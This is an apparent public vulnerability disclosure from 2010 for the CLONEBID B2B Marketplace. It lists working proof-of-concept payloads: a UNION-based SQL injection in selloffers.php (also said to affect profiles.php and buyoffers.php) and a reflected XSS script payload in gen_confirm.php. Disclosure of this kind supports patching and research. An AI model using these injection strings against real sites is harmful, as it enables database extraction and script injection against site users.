CLONEBID B2B Marketplace Multiple Vulnerabilities.pdf

1 /* 2 3 Name : CLONEBID B2B Marketplace 4 Vendor : http://www.clonebid.com 5 6 Author : Hamza ’MizoZ’ N. 7 Email : mizozx[at]gmail[dot]com 8 9 Greetz : Zuka ! 10 11 */ 12 13 # SQL Injection : 14 15 File : selloffers.php , Get : cid 16 17 [HOST]/[PATH]/selloffers.php?cid=[INJECTION] 18 19 Demo : http://server/selloffers.php?cid=−14+union+select+1,version%28%29,3,4,5,6,7,8−− 20 21 !!! : Same vuln => profiles.php & buyoffers.php 22 23 # XSS : 24 25 [HOST]/[PATH]/gen_confirm.php?errmsg=[SCRIPT :)] 26 27 Demo : http://server/gen_confirm.php?errmsg=%3Cscript%3Ealert%281337%29;%3C/script%3E 28 Page 1/1 CLONEBID B2B Marketplace Multiple Vulnerabilities Hamza ’MizoZ’ N. 01/16/2010